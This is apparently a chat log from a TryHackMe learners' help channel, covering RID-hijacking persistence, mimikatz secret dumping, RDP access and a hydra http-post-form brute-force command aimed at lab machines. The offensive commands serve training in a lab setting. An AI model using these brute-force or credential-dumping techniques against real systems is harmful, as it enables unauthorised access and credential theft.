doing https://tryhackme.com/room/introtoc2 this one task6
Hi mate.
I'm sorry for the late response.
YES. That was the issue.
You need to select properly when checking the RID.
I don't know if this detail should also be a note in the task, because the way you SELECT and make the change really makes the difference and ends up messing up everything.
I was able to RDP after changing the RID, but RDP access was behaving strangely, image flashing all over and you couldn't do anything.
It seems like the RID change has to be selected in a very specific way, otherwise it will mess with the whole system.
Yeah I had problems trying to RDP as well when not making sure you replace it correctly, as it is very easy to overwrite the incorrect values
The way I confirmed that it was done correctly was by looking at the line counter on the left, before I started to change the RID I had 0x50 lines of data
The first few times I was left with either 0x48 or 0x49, so I knew I had overwritten the wrong lines
I have always used xfreerdp as my client to set up the RDP session
xfreerdp /u:[USER] /p:[PASSWORD] /v:[MACHINE_IP]
This should work for you, if it doesn't there might be something related to the connection between you and the network I'm not sure
Glad it worked though
.
Exactly
I'll try to create my own lab with this privilege setup and try to replicate this RID persistence
I used Remmina in Kali
xfreerdp is very quick and easy through the terminal, maybe that will work
I also had an issue where I needed to reset the box, after this the RDP worked
Could anyone enlighten me what is the purpose of the ebcdic encoding used in the post compromise data exfiltration part (first method via tcp socket)?
Is it just to make it more unreadable (as it is already base64 encoded) or it is actually serving any purpose I am missing?
It is never used in any other method after this.
hello everyone! i had a problem with the Enumerating AD room and the Breaching AD room, the URLs of the mission page seem to be hijacked and always redirect me to a phishing page. Does anyone know what's going on?
What page are you redirected to? Also, you need to verify your account to post screenshots.
!docs verify
Need one more vote to reset the network in https://tryhackme.com/room/exploitingad
Which room is this please?
Going to assume password attacks.
Hi and hello
Hello
In the task3 task of Exploiting Active Directory room, after I used mimikatz's lsadump::secrets command, an ERROR kuhl_m_lsadump_secretsOrCache; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005) error occurred. Can the staff reset the room?
What the hell happens with this command: `hydra -l burgess -P burgess.lst 10.10.108.214 http-post-form "/login-post/index.php:username=burgess&password=^PASS^:-F=Incorrect" -f`? Every time I run it the output is a different password.
And it doesn't work on the login page.
What room is this please? In your command, try removing the - in -F=
Passwords Attacks -> Task 8 -> Last question
Aside from removing -, you can also remove -F= and still have the command work.